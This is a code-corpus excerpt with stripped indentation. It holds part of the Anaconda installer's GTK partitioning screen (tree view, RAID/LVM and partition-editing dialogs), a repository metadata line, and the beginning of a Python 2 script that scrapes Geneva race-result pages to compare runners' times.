class DiskTreeModelHelper:
def __init__(self, model, columns, iter):
self.model = model
self.iter = iter
self.columns = columns
def __getitem__(self, key):
if type(key) == types.StringType:
key = self.columns[key]
try:
return self.model.get_value(self.iter, key)
except:
return None
def __setitem__(self, key, value):
if type(key) == types.StringType:
key = self.columns[key]
self.model.set_value(self.iter, key, value)
class DiskTreeModel(gtk.TreeStore):
isLeaf = -3
isFormattable = -2
# format: column header, type, x alignment, hide?, visibleKey
titles = ((N_("Device"), gobject.TYPE_STRING, 0.0, 0, 0),
(N_("Mount Point"), gobject.TYPE_STRING, 0.0, 0, isLeaf),
(N_("Type"), gobject.TYPE_STRING, 0.0, 0, 0),
# (N_("Format"), gobject.TYPE_BOOLEAN, 0.5, 0, isFormattable),
# (N_("Size (MB)"), gobject.TYPE_STRING, 1.0, 0, isLeaf),
(N_("Format"), gobject.TYPE_OBJECT, 0.5, 0, isFormattable),
(N_("Size (MB)"), gobject.TYPE_STRING, 1.0, 0, 0),
(N_("Start"), gobject.TYPE_STRING, 1.0, 0, 1),
(N_("End"), gobject.TYPE_STRING, 1.0, 0, 1),
("", gobject.TYPE_STRING, 0.0, 0, 0),
# the following must be the last two
("IsLeaf", gobject.TYPE_BOOLEAN, 0.0, 1, 0),
("IsFormattable", gobject.TYPE_BOOLEAN, 0.0, 1, 0),
("PyObject", gobject.TYPE_PYOBJECT, 0.0, 1, 0))
def __init__(self):
self.hiddenPartitions = []
self.titleSlot = {}
i = 0
types = [self]
self.columns = []
for title, kind, alignment, hide, key in self.titles:
self.titleSlot[title] = i
types.append(kind)
if hide:
i += 1
continue
elif kind == gobject.TYPE_OBJECT:
renderer = gtk.CellRendererPixbuf()
propertyMapping = {'pixbuf': i}
elif kind == gobject.TYPE_BOOLEAN:
renderer = gtk.CellRendererToggle()
propertyMapping = {'active': i}
elif (kind == gobject.TYPE_STRING or
kind == gobject.TYPE_INT):
renderer = gtk.CellRendererText()
propertyMapping = {'text': i}
# wire in the cells that we want only visible on leaf nodes to
# the special leaf node column.
if key < 0:
propertyMapping['visible'] = len(self.titles) + key
renderer.set_property('xalign', alignment)
if title == "Mount Point":
title = _("Mount Point/\nRAID/Volume")
elif title == "Size (MB)":
title = _("Size\n(MB)")
elif title != "":
title = _(title)
col = apply(gtk.TreeViewColumn, (title, renderer),
propertyMapping)
col.set_alignment(0.5)
if kind == gobject.TYPE_STRING or kind == gobject.TYPE_INT:
col.set_property('sizing', gtk.TREE_VIEW_COLUMN_AUTOSIZE)
self.columns.append(col)
i += 1
apply(gtk.TreeStore.__init__, types)
self.view = gtk.TreeView(self)
# append all of the columns
map(self.view.append_column, self.columns)
def getTreeView(self):
return self.view
def clearHiddenPartitionsList(self):
self.hiddenPartitions = []
def appendToHiddenPartitionsList(self, member):
self.hiddenPartitions.append(member)
def selectPartition(self, partition):
# if we've hidden this partition in the tree view just return
if partition in self.hiddenPartitions:
return
pyobject = self.titleSlot['PyObject']
iter = self.get_iter_first()
parentstack = [None,]
parent = None
# iterate over the list, looking for the current mouse selection
while iter:
try:
rowpart = self.get_value(iter, pyobject)
except SystemError:
rowpart = None
if rowpart == partition:
path = self.get_path(parent)
self.view.expand_row(path, True)
selection = self.view.get_selection()
if selection is not None:
selection.unselect_all()
selection.select_iter(iter)
path = self.get_path(iter)
col = self.view.get_column(0)
self.view.set_cursor(path, col, False)
self.view.scroll_to_cell(path, col, True, 0.5, 0.5)
return
# if this is a parent node, and it didn't point to the partition
# we're looking for, get the first child and iter over them
elif self.iter_has_child(iter):
parent = iter
parentstack.append(iter)
iter = self.iter_children(iter)
continue
# get the next row.
iter = self.iter_next(iter)
# if there isn't a next row and we had a parent, go to the next
# node after our parent
while not iter and parent:
# pop last parent off of parentstack and resume search at next
# node after the last parent... and don't forget to update the
# variable "parent" to its new value
if len(parentstack) > 0:
iter = self.iter_next(parentstack.pop())
parent = parentstack[-1]
else:
# we've fallen off the end of the model, and we have
# not found the partition
raise RuntimeError, "could not find partition"
""" returns partition 'id' of current selection in tree """
def getCurrentPartition(self):
selection = self.view.get_selection()
model, iter = selection.get_selected()
if not iter:
return None
pyobject = self.titleSlot['PyObject']
try:
val = self.get_value(iter, pyobject)
if type(val) == type("/dev/"):
if val[:5] == '/dev/':
return None
return val
except:
return None
""" Return name of current selected drive (if a drive is highlighted) """
def getCurrentDevice(self):
selection = self.view.get_selection()
model, iter = selection.get_selected()
if not iter:
return None
pyobject = self.titleSlot['PyObject']
try:
val = self.get_value(iter, pyobject)
if type(val) == type("/dev/"):
if val[:5] == '/dev/':
return val
return None
except:
return None
def resetSelection(self):
pass
## selection = self.view.get_selection()
## selection.set_mode(gtk.SELECTION_SINGLE)
## selection.set_mode(gtk.SELECTION_BROWSE)
def clear(self):
selection = self.view.get_selection()
if selection is not None:
selection.unselect_all()
gtk.TreeStore.clear(self)
def __getitem__(self, iter):
if type(iter) == gtk.TreeIter:
return DiskTreeModelHelper(self, self.titleSlot, iter)
raise KeyError, iter
class PartitionWindow(InstallWindow):
def __init__(self, ics):
InstallWindow.__init__(self, ics)
ics.setTitle(_("Partitioning"))
ics.setNextEnabled(True)
self.parent = ics.getICW().window
def quit(self):
pass
def presentPartitioningComments(self,title, labelstr1, labelstr2, comments,
type="ok", custom_buttons=None):
if flags.autostep:
return 1
win = gtk.Dialog(title)
gui.addFrame(win)
if type == "ok":
win.add_button('gtk-ok', 1)
defaultchoice = 0
elif type == "yesno":
win.add_button('gtk-no', 2)
win.add_button('gtk-yes', 1)
defaultchoice = 1
elif type == "continue":
win.add_button('gtk-cancel', 0)
win.add_button(_("Continue"), 1)
defaultchoice = 1
elif type == "custom":
rid=0
for button in custom_buttons:
widget = win.add_button(button, rid)
rid = rid + 1
defaultchoice = rid - 1
image = gtk.Image()
image.set_from_stock('gtk-dialog-warning', gtk.ICON_SIZE_DIALOG)
hbox = gtk.HBox(False, 9)
al=gtk.Alignment(0.0, 0.0)
al.add(image)
hbox.pack_start(al, False)
buffer = gtk.TextBuffer(None)
buffer.set_text(comments)
text = gtk.TextView()
text.set_buffer(buffer)
text.set_property("editable", False)
text.set_property("cursor_visible", False)
text.set_wrap_mode(gtk.WRAP_WORD)
sw = gtk.ScrolledWindow()
sw.add(text)
sw.set_size_request(400, 200)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
info1 = gtk.Label(labelstr1)
info1.set_line_wrap(True)
info1.set_size_request(400, -1)
info2 = gtk.Label(labelstr2)
info2.set_line_wrap(True)
info2.set_size_request(400, -1)
vbox = gtk.VBox(False, 9)
al=gtk.Alignment(0.0, 0.0)
al.add(info1)
vbox.pack_start(al, False)
vbox.pack_start(sw, True, True)
al=gtk.Alignment(0.0, 0.0)
al.add(info2)
vbox.pack_start(al, True)
hbox.pack_start(vbox, True, True)
win.vbox.pack_start(hbox)
win.set_position(gtk.WIN_POS_CENTER)
win.set_default_response(defaultchoice)
win.show_all()
rc = win.run()
win.destroy()
return rc
def getNext(self):
(errors, warnings) = self.partitions.sanityCheckAllRequests(self.diskset)
if errors:
labelstr1 = _("The following critical errors exist "
"with your requested partitioning "
"scheme.")
labelstr2 = _("These errors must be corrected prior "
"to continuing with your install of "
"%s.") % (productName,)
commentstr = string.join(errors, "\n\n")
self.presentPartitioningComments(_("Partitioning Errors"),
labelstr1, labelstr2,
commentstr, type="ok")
raise gui.StayOnScreen
if warnings:
labelstr1 = _("The following warnings exist with "
"your requested partition scheme.")
labelstr2 = _("Would you like to continue with "
"your requested partitioning "
"scheme?")
commentstr = string.join(warnings, "\n\n")
rc = self.presentPartitioningComments(_("Partitioning Warnings"),
labelstr1, labelstr2,
commentstr,
type="yesno")
if rc != 1:
raise gui.StayOnScreen
formatWarnings = getPreExistFormatWarnings(self.partitions,
self.diskset)
if formatWarnings:
labelstr1 = _("The following pre-existing partitions have been "
"selected to be formatted, destroying all data.")
# labelstr2 = _("Select 'Yes' to continue and format these "
# "partitions, or 'No' to go back and change these "
# "settings.")
labelstr2 = ""
commentstr = ""
for (dev, type, mntpt) in formatWarnings:
commentstr = commentstr + \
"/dev/%s %s %s\n" % (dev,type,mntpt)
rc = self.presentPartitioningComments(_("Format Warnings"),
labelstr1, labelstr2,
commentstr,
type="custom",
custom_buttons=["gtk-cancel",
_("_Format")])
if rc != 1:
raise gui.StayOnScreen
self.diskStripeGraph.shutDown()
self.tree.clear()
del self.parent
return None
def getPrev(self):
self.diskStripeGraph.shutDown()
self.tree.clear()
del self.parent
return None
def getShortFSTypeName(self, name):
if name == "physical volume (LVM)":
return "LVM PV"
return name
def populate(self, initial = 0):
drives = self.diskset.disks.keys()
drives.sort()
self.tree.resetSelection()
self.tree.clearHiddenPartitionsList()
# first do LVM
lvmrequests = self.partitions.getLVMRequests()
if lvmrequests:
lvmparent = self.tree.append(None)
self.tree[lvmparent]['Device'] = _("LVM Volume Groups")
for vgname in lvmrequests.keys():
vgrequest = self.partitions.getRequestByVolumeGroupName(vgname)
rsize = vgrequest.getActualSize(self.partitions, self.diskset)
vgparent = self.tree.append(lvmparent)
self.tree[vgparent]['Device'] = "%s" % (vgname,)
self.tree[vgparent]['Mount Point'] = ""
self.tree[vgparent]['Start'] = ""
self.tree[vgparent]['End'] = ""
self.tree[vgparent]['Size (MB)'] = "%Ld" % (rsize,)
self.tree[vgparent]['PyObject'] = str(vgrequest.uniqueID)
for lvrequest in lvmrequests[vgname]:
iter = self.tree.append(vgparent)
self.tree[iter]['Device'] = lvrequest.logicalVolumeName
if lvrequest.fstype and lvrequest.mountpoint:
self.tree[iter]['Mount Point'] = lvrequest.mountpoint
else:
self.tree[iter]['Mount Point'] = ""
self.tree[iter]['Size (MB)'] = "%Ld" % (lvrequest.getActualSize(self.partitions, self.diskset),)
self.tree[iter]['PyObject'] = str(lvrequest.uniqueID)
ptype = lvrequest.fstype.getName()
if lvrequest.isEncrypted(self.partitions, True) and lvrequest.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif lvrequest.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
self.tree[iter]['IsFormattable'] = lvrequest.fstype.isFormattable()
self.tree[iter]['IsLeaf'] = True
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = ""
self.tree[iter]['End'] = ""
# handle RAID next
raidrequests = self.partitions.getRaidRequests()
if raidrequests:
raidparent = self.tree.append(None)
self.tree[raidparent]['Device'] = _("RAID Devices")
for request in raidrequests:
mntpt = None
if request and request.fstype and request.fstype.getName() == "physical volume (LVM)":
vgreq = self.partitions.getLVMVolumeGroupMemberParent(request)
if vgreq and vgreq.volumeGroupName:
if self.show_uneditable:
mntpt = vgreq.volumeGroupName
else:
self.tree.appendToHiddenPartitionsList(str(request.uniqueID))
continue
else:
mntpt = ""
iter = self.tree.append(raidparent)
if mntpt:
self.tree[iter]["Mount Point"] = mntpt
if request and request.mountpoint:
self.tree[iter]["Mount Point"] = request.mountpoint
if request.fstype:
ptype = self.getShortFSTypeName(request.fstype.getName())
if request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
self.tree[iter]['IsFormattable'] = request.fstype.isFormattable()
else:
ptype = _("None")
self.tree[iter]['IsFormattable'] = False
try:
device = "/dev/md%d" % (request.raidminor,)
except:
device = "Auto"
self.tree[iter]['IsLeaf'] = True
self.tree[iter]['Device'] = device
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = ""
self.tree[iter]['End'] = ""
self.tree[iter]['Size (MB)'] = "%Ld" % (request.getActualSize(self.partitions, self.diskset),)
self.tree[iter]['PyObject'] = str(request.uniqueID)
# now normal partitions
drvparent = self.tree.append(None)
self.tree[drvparent]['Device'] = _("Hard Drives")
for drive in drives:
disk = self.diskset.disks[drive]
# add a disk stripe to the graph
stripe = self.diskStripeGraph.add(drive, disk)
# add a parent node to the tree
parent = self.tree.append(drvparent)
self.tree[parent]['Device'] = '/dev/%s' % (drive,)
self.tree[parent]['PyObject'] = str('/dev/%s' % (drive,))
sectorsPerCyl = disk.dev.heads * disk.dev.sectors
extendedParent = None
part = disk.next_partition()
while part:
if part.type & parted.PARTITION_METADATA:
part = disk.next_partition(part)
continue
# ignore the tiny < 1 MB partitions (#119479)
if getPartSizeMB(part) <= 1.0:
if not part.is_active() or not part.get_flag(parted.PARTITION_BOOT):
part = disk.next_partition(part)
continue
stripe.add(part)
device = get_partition_name(part)
request = self.partitions.getRequestByDeviceName(device)
if part.type == parted.PARTITION_EXTENDED:
if extendedParent:
raise RuntimeError, ("can't handle more than "
"one extended partition per disk")
extendedParent = self.tree.append(parent)
iter = extendedParent
elif part.type & parted.PARTITION_LOGICAL:
if not extendedParent:
raise RuntimeError, ("crossed logical partition "
"before extended")
iter = self.tree.append(extendedParent)
self.tree[iter]['IsLeaf'] = True
else:
iter = self.tree.append(parent)
self.tree[iter]['IsLeaf'] = True
if request and request.mountpoint:
self.tree[iter]['Mount Point'] = request.mountpoint
else:
self.tree[iter]['Mount Point'] = ""
if request and request.fstype and request.fstype.getName() == "physical volume (LVM)":
vgreq = self.partitions.getLVMVolumeGroupMemberParent(request)
if vgreq and vgreq.volumeGroupName:
if self.show_uneditable:
self.tree[iter]['Mount Point'] = vgreq.volumeGroupName
else:
self.tree.appendToHiddenPartitionsList(part)
part = disk.next_partition(part)
self.tree.remove(iter)
continue
else:
self.tree[iter]['Mount Point'] = ""
if request and request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request and request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
if request and request.fstype:
self.tree[iter]['IsFormattable'] = request.fstype.isFormattable()
if part.type & parted.PARTITION_FREESPACE:
ptype = _("Free space")
elif part.type == parted.PARTITION_EXTENDED:
ptype = _("Extended")
elif part.get_flag(parted.PARTITION_RAID) == 1:
ptype = _("software RAID")
parreq = self.partitions.getRaidMemberParent(request)
if parreq:
if self.show_uneditable:
try:
mddevice = "/dev/md%d" % (parreq.raidminor,)
except:
mddevice = "Auto"
self.tree[iter]['Mount Point'] = mddevice
else:
self.tree.appendToHiddenPartitionsList(part)
part = disk.next_partition(part)
self.tree.remove(iter)
continue
else:
self.tree[iter]['Mount Point'] = ""
elif part.fs_type:
if request and request.fstype != None:
ptype = self.getShortFSTypeName(request.fstype.getName())
if ptype == "foreign":
ptype = map_foreign_to_fsname(part.native_type)
else:
ptype = part.fs_type.name
if request and request.isEncrypted(self.partitions, True) and request.format:
self.tree[iter]['Format'] = self.lock_pixbuf
elif request and request.format:
self.tree[iter]['Format'] = self.checkmark_pixbuf
else:
if request and request.fstype != None:
ptype = self.getShortFSTypeName(request.fstype.getName())
if ptype == "foreign":
ptype = map_foreign_to_fsname(part.native_type)
else:
ptype = _("None")
if part.type & parted.PARTITION_FREESPACE:
devname = _("Free")
else:
devname = '/dev/%s' % (device,)
self.tree[iter]['Device'] = devname
self.tree[iter]['Type'] = ptype
self.tree[iter]['Start'] = str(start_sector_to_cyl(disk.dev,
part.geom.start))
self.tree[iter]['End'] = str(end_sector_to_cyl(disk.dev,
part.geom.end))
size = getPartSizeMB(part)
if size < 1.0:
sizestr = "< 1"
else:
sizestr = "%Ld" % (size)
self.tree[iter]['Size (MB)'] = sizestr
self.tree[iter]['PyObject'] = part
part = disk.next_partition(part)
canvas = self.diskStripeGraph.getCanvas()
apply(canvas.set_scroll_region, canvas.root().get_bounds())
self.treeView.expand_all()
def treeActivateCb(self, view, path, col):
if self.tree.getCurrentPartition():
self.editCb()
def treeSelectCb(self, selection, *args):
model, iter = selection.get_selected()
if not iter:
return
partition = model[iter]['PyObject']
if partition:
self.diskStripeGraph.selectSlice(partition)
def newCB(self, widget):
# create new request of size 1M
request = NewPartitionSpec(fileSystemTypeGetDefault(), size = 100)
self.editPartitionRequest(request, isNew = 1)
def deleteCb(self, widget):
curselection = self.tree.getCurrentPartition()
if curselection:
if doDeletePartitionByRequest(self.intf, self.partitions, curselection):
self.refresh()
else:
curdevice = self.tree.getCurrentDevice()
if curdevice and len(curdevice) > 5:
if doDeletePartitionsByDevice(self.intf, self.partitions, self.diskset, curdevice[5:]):
self.refresh()
else:
return
def resetCb(self, *args):
if not confirmResetPartitionState(self.intf):
return
self.diskStripeGraph.shutDown()
self.newFsset = self.fsset.copy()
self.diskset.refreshDevices()
self.partitions.setFromDisk(self.diskset)
self.tree.clear()
self.populate()
def refresh(self):
self.diskStripeGraph.shutDown()
self.tree.clear()
# XXXX - Backup some info which doPartitioning munges if it fails
origInfoDict = {}
for request in self.partitions.requests:
try:
origInfoDict[request.uniqueID] = (request.requestSize, request.currentDrive)
except:
pass
try:
autopart.doPartitioning(self.diskset, self.partitions)
rc = 0
except PartitioningError, msg:
try:
for request in self.partitions.requests:
if request.uniqueID in origInfoDict.keys():
(request.requestSize, request.currentDrive) = origInfoDict[request.uniqueID]
except:
log.error("Failed to restore original info")
self.intf.messageWindow(_("Error Partitioning"),
_("Could not allocate requested partitions: %s.") % (msg),
custom_icon="error")
rc = -1
except PartitioningWarning, msg:
# XXX somebody other than me should make this look better
# XXX this doesn't handle the 'delete /boot partition spec' case
# (it says 'add anyway')
dialog = gtk.MessageDialog(self.parent, 0, gtk.MESSAGE_WARNING,
gtk.BUTTONS_NONE,
_("Warning: %s.") % (msg))
gui.addFrame(dialog)
button = gtk.Button(_("_Modify Partition"))
dialog.add_action_widget(button, 1)
button = gtk.Button(_("_Continue"))
dialog.add_action_widget(button, 2)
dialog.set_position(gtk.WIN_POS_CENTER)
dialog.show_all()
rc = dialog.run()
dialog.destroy()
if rc == 1:
rc = -1
else:
rc = 0
reqs = self.partitions.getBootableRequest()
if reqs:
for req in reqs:
req.ignoreBootConstraints = 1
if not rc == -1:
self.populate()
return rc
def editCb(self, *args):
part = self.tree.getCurrentPartition()
(type, request) = doEditPartitionByRequest(self.intf, self.partitions,
part)
if request:
if type == "RAID":
self.editRaidRequest(request)
elif type == "LVMVG":
self.editLVMVolumeGroup(request)
elif type == "LVMLV":
vgrequest = self.partitions.getRequestByID(request.volumeGroup)
self.editLVMVolumeGroup(vgrequest)
elif type == "NEW":
self.editPartitionRequest(request, isNew = 1)
else:
self.editPartitionRequest(request)
# isNew implies that this request has never been successfully used before
def editRaidRequest(self, raidrequest, isNew = 0):
raideditor = raid_dialog_gui.RaidEditor(self.partitions,
self.diskset, self.intf,
self.parent, raidrequest,
isNew)
origpartitions = self.partitions.copy()
while 1:
request = raideditor.run()
if request is None:
return
if not isNew:
self.partitions.removeRequest(raidrequest)
if raidrequest.getPreExisting():
delete = partRequests.DeleteRAIDSpec(raidrequest.raidminor)
self.partitions.addDelete(delete)
self.partitions.addRequest(request)
if self.refresh():
if not isNew:
self.partitions = origpartitions.copy()
if self.refresh():
raise RuntimeError, ("Returning partitions to state "
"prior to RAID edit failed")
continue
else:
break
raideditor.destroy()
def editPartitionRequest(self, origrequest, isNew = 0, restrictfs = None):
parteditor = partition_dialog_gui.PartitionEditor(self.anaconda,
self.parent,
origrequest,
isNew = isNew,
restrictfs = restrictfs)
while 1:
request = parteditor.run()
if request is None:
return 0
if not isNew:
self.partitions.removeRequest(origrequest)
self.partitions.addRequest(request)
if self.refresh():
# the add failed; remove what we just added and put
# back what was there if we removed it
self.partitions.removeRequest(request)
if not isNew:
self.partitions.addRequest(origrequest)
if self.refresh():
# this worked before and doesn't now...
raise RuntimeError, ("Returning partitions to state "
"prior to edit failed")
else:
break
parteditor.destroy()
return 1
def editLVMVolumeGroup(self, origvgrequest, isNew = 0):
vgeditor = lvm_dialog_gui.VolumeGroupEditor(self.partitions,
self.diskset,
self.intf, self.parent,
origvgrequest, isNew)
origpartitions = self.partitions.copy()
origvolreqs = origpartitions.getLVMLVForVG(origvgrequest)
while (1):
rc = vgeditor.run()
#
# return code is either None or a tuple containing
# volume group request and logical volume requests
#
if rc is None:
return
(vgrequest, logvolreqs) = rc
# first add the volume group
if not isNew:
# if an lv was preexisting and isn't in the new lv requests,
# we need to add a delete for it.
for lv in origvolreqs:
if not lv.getPreExisting():
continue
found = 0
for newlv in logvolreqs:
if (newlv.getPreExisting() and
newlv.logicalVolumeName == lv.logicalVolumeName):
found = 1
break
if found == 0:
delete = partRequests.DeleteLogicalVolumeSpec(lv.logicalVolumeName,
origvgrequest.volumeGroupName)
self.partitions.addDelete(delete)
for lv in origvolreqs:
self.partitions.removeRequest(lv)
self.partitions.removeRequest(origvgrequest)
vgID = self.partitions.addRequest(vgrequest)
# now add the logical volumes
for lv in logvolreqs:
lv.volumeGroup = vgID
if not lv.getPreExisting():
lv.format = 1
self.partitions.addRequest(lv)
if self.refresh():
if not isNew:
self.partitions = origpartitions.copy()
if self.refresh():
raise RuntimeError, ("Returning partitions to state "
"prior to edit failed")
continue
else:
break
vgeditor.destroy()
def makeLvmCB(self, widget):
if (not fileSystemTypeGet('physical volume (LVM)').isSupported() or
not lvm.has_lvm()):
self.intf.messageWindow(_("Not supported"),
_("LVM is NOT supported on "
"this platform."), type="ok",
custom_icon="error")
return
request = VolumeGroupRequestSpec(format = True)
self.editLVMVolumeGroup(request, isNew = 1)
return
def makeraidCB(self, widget):
if not fileSystemTypeGet('software RAID').isSupported():
self.intf.messageWindow(_("Not supported"),
_("Software RAID is NOT supported on "
"this platform."), type="ok",
custom_icon="error")
return
availminors = self.partitions.getAvailableRaidMinors()
if len(availminors) < 1:
self.intf.messageWindow(_("No RAID minor device numbers available"),
_("A software RAID device cannot "
"be created because all of the "
"available RAID minor device numbers "
"have been used."),
type="ok", custom_icon="error")
return
# see if we have enough free software RAID partitions first
# if no raid partitions exist, raise an error message and return
request = RaidRequestSpec(fileSystemTypeGetDefault())
availraidparts = self.partitions.getAvailRaidPartitions(request,
self.diskset)
dialog = gtk.Dialog(_("RAID Options"), self.parent)
gui.addFrame(dialog)
dialog.add_button('gtk-cancel', 2)
dialog.add_button('gtk-ok', 1)
dialog.set_position(gtk.WIN_POS_CENTER)
maintable = gtk.Table()
maintable.set_row_spacings(5)
maintable.set_col_spacings(5)
row = 0
lbltxt = _("Software RAID allows you to combine "
"several disks into a larger "
"RAID device. A RAID device can be configured to "
"provide additional speed and "
"reliability compared to using an individual drive. "
"For more information on using RAID devices "
"please consult the %s documentation.\n\n"
"You currently have %s software RAID "
"partition(s) free to use.\n\n") % (productName, len(availraidparts))
if len(availraidparts) < 2:
lbltxt = lbltxt + _("To use RAID you must first "
"create at least two partitions of type "
"'software RAID'. Then you can "
"create a RAID device which can "
"be formatted and mounted.\n\n")
lbltxt = lbltxt + _("What do you want to do now?")
lbl = gui.WrappingLabel(lbltxt)
maintable.attach(lbl, 0, 1, row, row + 1)
row = row + 1
newminor = availminors[0]
radioBox = gtk.VBox (False)
createRAIDpart = gtk.RadioButton(None, _("Create a software RAID _partition."))
radioBox.pack_start(createRAIDpart, False, False, padding=10)
createRAIDdev = gtk.RadioButton(createRAIDpart,
_("Create a RAID _device [default=/dev/md%s].") % newminor)
radioBox.pack_start(createRAIDdev, False, False, padding=10)
doRAIDclone = gtk.RadioButton(createRAIDpart,
_("Clone a _drive to create a "
"RAID device [default=/dev/md%s].") % newminor)
radioBox.pack_start(doRAIDclone, False, False, padding=10)
createRAIDpart.set_active(1)
doRAIDclone.set_sensitive(0)
createRAIDdev.set_sensitive(0)
if len(availraidparts) > 0 and len(self.diskset.disks.keys()) > 1:
doRAIDclone.set_sensitive(1)
if len(availraidparts) > 1:
createRAIDdev.set_active(1)
createRAIDdev.set_sensitive(1)
align = gtk.Alignment(0.5, 0.0)
align.add(radioBox)
maintable.attach(align,0,1,row, row+1)
row = row + 1
maintable.show_all()
dialog.vbox.pack_start(maintable)
dialog.show_all()
rc = dialog.run()
dialog.destroy()
if rc == 2:
return
# see which option they choose
if createRAIDpart.get_active():
rdrequest = NewPartitionSpec(fileSystemTypeGet("software RAID"), size = 100)
rc = self.editPartitionRequest(rdrequest, isNew = 1, restrictfs=["software RAID"])
elif createRAIDdev.get_active():
self.editRaidRequest(request, isNew=1)
else:
cloneDialog = raid_dialog_gui.RaidCloneDialog(self.partitions,
self.diskset,
self.intf,
self.parent)
if cloneDialog is None:
self.intf.messageWindow(_("Couldn't Create Drive Clone Editor"),
_("The drive clone editor could not "
"be created for some reason."),
custom_icon="error")
return
while 1:
rc = cloneDialog.run()
if rc:
self.refresh()
cloneDialog.destroy()
return
def viewButtonCB(self, widget):
self.show_uneditable = not widget.get_active()
self.diskStripeGraph.shutDown()
self.tree.clear()
self.populate()
def getScreen(self, anaconda):
self.anaconda = anaconda
self.fsset = anaconda.id.fsset
self.diskset = anaconda.id.diskset
self.intf = anaconda.intf
self.diskset.openDevices()
self.partitions = anaconda.id.partitions
self.show_uneditable = 1
checkForSwapNoMatch(anaconda)
# XXX PartitionRequests() should already exist and
# if upgrade or going back, have info filled in
# self.newFsset = self.fsset.copy()
# load up checkmark
self.checkmark_pixbuf = gtk.gdk.pixbuf_new_from_inline(len(new_checkmark), new_checkmark, False)
self.lock_pixbuf = gui.getPixbuf("gnome-lock.png")
# operational buttons
buttonBox = gtk.HButtonBox()
buttonBox.set_layout(gtk.BUTTONBOX_SPREAD)
ops = ((_("Ne_w"), self.newCB),
(_("_Edit"), self.editCb),
(_("_Delete"), self.deleteCb),
(_("Re_set"), self.resetCb),
(_("R_AID"), self.makeraidCB),
(_("_LVM"), self.makeLvmCB))
for label, cb in ops:
button = gtk.Button(label)
buttonBox.add (button)
button.connect ("clicked", cb)
self.tree = DiskTreeModel()
self.treeView = self.tree.getTreeView()
self.treeView.connect('row-activated', self.treeActivateCb)
self.treeViewSelection = self.treeView.get_selection()
self.treeViewSelection.connect("changed", self.treeSelectCb)
# set up the canvas
self.diskStripeGraph = DiskStripeGraph(self.tree, self.editCb)
# do the initial population of the tree and the graph
self.populate(initial = 1)
vpaned = gtk.VPaned()
hadj = gtk.Adjustment(step_incr = 5.0)
vadj = gtk.Adjustment(step_incr = 5.0)
sw = gtk.ScrolledWindow(hadjustment = hadj, vadjustment = vadj)
sw.add(self.diskStripeGraph.getCanvas())
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
frame = gtk.Frame()
frame.add(sw)
vpaned.add1(frame)
box = gtk.VBox(False, 5)
box.pack_start(buttonBox, False)
sw = gtk.ScrolledWindow()
sw.add(self.treeView)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_IN)
box.pack_start(sw, True)
self.toggleViewButton = gtk.CheckButton(_("Hide RAID device/LVM Volume _Group members"))
self.toggleViewButton.set_active(not self.show_uneditable)
self.toggleViewButton.connect("toggled", self.viewButtonCB)
box.pack_start(self.toggleViewButton, False, False)
vpaned.add2(box)
# XXX should probably be set according to height
vpaned.set_position(175)
return vpaned
|
sergey-senozhatsky/anaconda-11-vlan-support
|
iw/partition_gui.py
|
Python
|
gpl-2.0
| 50,370
|
import urllib2
import re
import math
from datetime import datetime
from collections import namedtuple
import operator
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import lxml.html
import pandas as pd
meyrin_url = "http://services.datasport.com/%i/lauf/meyrin/RANG091.HTM"
semi_url = "http://services.datasport.com/%i/lauf/genevema/RANG095.HTM"
f_meyrin_url = "http://services.datasport.com/%i/lauf/meyrin/RANG092.HTM"
f_semi_url = "http://services.datasport.com/%i/lauf/genevema/RANG096.HTM"
def get_data(url, year):
return urllib2.urlopen(url%(year)).read()
def runners(results_page, matcher, detail=False):
observations = []
results_table = lxml.html.fromstring(results_page)
#lines = results_table.body.find("pre").findall("font")[2].text_content()
fonts = results_table.body.find("pre").findall("font")
fonts = [e for e in fonts if e.attrib.get('size', "0")=="2"]
lines = "".join(e.text_content() for e in fonts)
lines = [l.strip() for l in lines.split("\r\n")]
lines = [l for l in lines if l]
runners = {}
for line in lines:
if detail:
print line.encode('utf-8')
match = matcher(line, detail)
if match is not None:
surname, name, time = match
if time[0].isnumeric():
key = surname.encode('utf-8') +" "+name.encode('utf-8')
if detail:
print key, time
print "-"*80
runners[hash(key)] = (time, key)
return runners
def semier(line, detail=False):
l = line.split()
time = l[-6]
name = l[1]
surname = l[2]
if time[0].isnumeric():
if detail:
print name.encode('utf-8'), surname.encode('utf-8'), time
print "-"*80
return name, surname, time
def meyriner(line, detail=False):
l = line.split()
time = l[-5]
name = l[1]
surname = l[2]
if time[0].isnumeric():
if detail:
print name.encode('utf-8'), surname.encode('utf-8'), time
print "-"*80
return name, surname, time
def seconds(t):
secs = 0
if ":" in t:
secs += int(t[0]) * 60*60
t = t[2:]
mins = int(t[:2])
secs += mins*60
secs += int(t[3]+t[4])
return secs
def nice_time(x, pos):
mins, hrs = math.modf(x/3600.)
secs, mins = math.modf(mins * 60)
secs *= 60
if hrs > 0:
return "%i:%02i.%02i"%(hrs, mins, secs)
else:
return "%02i.%02i"%(mins, secs)
if __name__ == "__main__":
meyrin = []
semi = []
# Use the foulee of year N to predict for semi in year N+1
for year in (2010, 2011):
a = runners(get_data(meyrin_url, year), meyriner, detail=False)
a.update(runners(get_data(f_meyrin_url, year), meyriner, detail=False))
b = runners(get_data(semi_url, year+1), semier, detail=False)
b.update(runners(get_data(f_semi_url, year+1), semier, detail=False))
a_ = set(a.keys())
b_ = set(b.keys())
both = [(a[runner][1], a[runner][0], b[runner][0]) for runner in a_.intersection(b_)]
print "In the year", year, len(both), "runners ran both the Foulees and the semi"
print "Runners sorted by semi marathon time"
print
for name, time1, time2 in sorted(both, key=operator.itemgetter(2)):
print name, time1, time2
meyrin.append(seconds(time1))
semi.append(seconds(time2))
